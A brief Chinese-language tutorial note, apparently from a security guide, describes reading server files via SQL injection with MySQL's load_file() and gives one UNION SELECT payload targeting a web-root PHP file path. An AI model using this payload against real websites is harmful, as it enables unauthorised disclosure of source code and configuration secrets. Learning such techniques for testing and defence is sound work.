利用sql注入读取文件的方法:
文件读取可以使用load_file()函数,在使用之前需要先找到网站的绝对路径,使用示例:
union select 1,load_file(“c:/inetpub/wwwroot/index.php”),3